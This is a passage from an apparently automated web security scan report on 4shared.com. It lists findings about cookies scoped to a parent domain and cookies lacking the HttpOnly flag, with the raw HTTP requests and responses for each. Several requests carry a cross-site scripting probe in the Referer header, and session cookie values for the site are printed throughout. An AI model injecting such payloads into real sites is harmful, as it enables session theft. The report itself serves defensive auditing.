Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:26 GMT
ETag: W/"11860-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 11860
Date: Fri, 29 Jul 2011 14:05:26 GMT

/**
* plupload.flash.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/contri
...[SNIP]...

5.8. http://www.4shared.com/js/plupload/plupload.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/plupload/plupload.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plupload/plupload.js HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-762786172; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"42158-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 42158
Date: Fri, 29 Jul 2011 14:05:25 GMT

/**
* plupload.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/contributing
...[SNIP]...

5.9. http://www.4shared.com/js/plupload/plupload.silverlight.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/plupload/plupload.silverlight.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/plupload/plupload.silverlight.js HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-757579128; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"13014-1302522786000"
Last-Modified: Mon, 11 Apr 2011 11:53:06 GMT
Content-Type: text/javascript
Content-Length: 13014
Date: Fri, 29 Jul 2011 14:05:25 GMT

/**
* plupload.silverlight.js
*
* Copyright 2009, Moxiecode Systems AB
* Released under GPL License.
*
* License: http://www.plupload.com/license
* Contributing: http://www.plupload.com/
...[SNIP]...

5.10. http://www.4shared.com/js/signup-script.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/signup-script.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:14 GMT
Vary: *
Content-Type: text/javascript
Content-Length: 3516
Date: Fri, 29 Jul 2011 14:08:14 GMT


function checkForm(form) {
var form=document.theForm;
if (form.login.value==null || form.login.value.length==0) {
alert ("You did not enter your e-mail address");
form.
...[SNIP]...

5.11. http://www.4shared.com/sla.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /sla.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sla.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 24527
Date: Fri, 29 Jul 2011 14:08:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Service Lev
...[SNIP]...

5.12. http://www.4shared.com/enter.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35973
Date: Fri, 29 Jul 2011 13:57:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...

5.13. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...

5.14. http://www.4shared.com/signup.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signup.jsp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: ppVisited=%2Fsignup.jsp; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947872791; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 23864
Date: Fri, 29 Jul 2011 13:57:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; ch
...[SNIP]...

6. Cookie without HttpOnly flag set  previous  next
There are 154 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



6.1. http://www.4shared.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; day1host=h; WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; hostid=263556618; __utma=210074320.358922166.1311948340.1311948340.1311948340.1; __utmb=210074320.0.10.1311948340; __utmc=210074320; __utmz=210074320.1311948340.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-217047336-1311948341109

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
ETag: W/"1150-1295256540000"
Last-Modified: Mon, 17 Jan 2011 09:29:00 GMT
Content-Length: 1150
Date: Fri, 29 Jul 2011 14:08:28 GMT

............ .h.......(....... ..... ....................................................................
............................................................sT..oQ.....4...................
..
...[SNIP]...

6.2. http://www.4shared.com/icons/16x16/default.png  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /icons/16x16/default.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/16x16/default.png HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:57:01 GMT
ETag: W/"416-1311851860000"
Last-Modified: Thu, 28 Jul 2011 11:17:40 GMT
Content-Type: image/png
Content-Length: 416
Date: Fri, 29 Jul 2011 13:57:00 GMT

.PNG
.
...IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...BIDATx....J.@..g&...M.....KP|.....x./mR.'...".....L.....&.,....ag&;...n...i4z.^.[.e.P7.....qq.....s......8....A. Nu..t.|...<_%.
...[SNIP]...

6.3. http://www.4shared.com/images/asf-logo.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /images/asf-logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/asf-logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/asf-logo.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:40 GMT
Content-Length: 38668


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...

6.4. http://www.4shared.com/images/spacer.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /images/spacer.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/spacer.gif HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:25 GMT; Path=/
Set-Cookie: WWW_JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330; Domain=.4shared.com; Path=/
Set-Cookie: hostid=-720656152; Expires=Mon, 26-Jul-2021 14:05:25 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:25 GMT
ETag: W/"43-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 43
Date: Fri, 29 Jul 2011 14:05:25 GMT

GIF89a.............!.......,...........D..;

6.5. http://www.4shared.com/images/tomcat.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /images/tomcat.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/tomcat.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/tomcat.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4AE600031E51DE28C97F64F946EE76F5.dc329; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:40 GMT
Content-Length: 38482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...

6.6. http://www.4shared.com/images/void.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /images/void.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/void.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/void.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=38495591D688E5F4D8D920445CB59833.dc329; Path=/
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:07:41 GMT
Content-Length: 38652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...

6.7. http://www.4shared.com/js/Jsonp.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/Jsonp.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Jsonp.js?ver=5756 HTTP/1.1
Host: www.4shared.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/favicon.icof195b%22-alert(document.location)-%226b92c01de75
Cookie: JSESSIONID=60B49916F814CD9E6201A558BD8C76F2.dc330

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:25 GMT
ETag: W/"720-1303901808000"
Last-Modified: Wed, 27 Apr 2011 10:56:48 GMT
Content-Type: text/javascript
Content-Length: 720
Date: Fri, 29 Jul 2011 14:08:25 GMT


function Jsonp(options) {
options = $.extend(true, {
url: '',
jsonp: function() { }
}, options)

var id = Math.random()
options.url = options.url + (options.url.indexOf("?") > 0 ? '&'
...[SNIP]...

6.8. http://www.4shared.com/js/homeScript.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/homeScript.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/homeScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=00339AC45B50830C2A985D9B562FA591.dc329; Domain=.4shared.com; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:09:58 GMT
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 44840
Date: Fri, 29 Jul 2011 14:09:58 GMT


var i=1;
var ua = navigator.userAgent;
var opera = /opera [56789]|opera\/[56789]/i.test(ua);
var ie = !opera && /MSIE/.test(ua);
var ie50 = ie && /MSIE 5\.[
...[SNIP]...

6.9. http://www.4shared.com/js/loginScript.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/loginScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
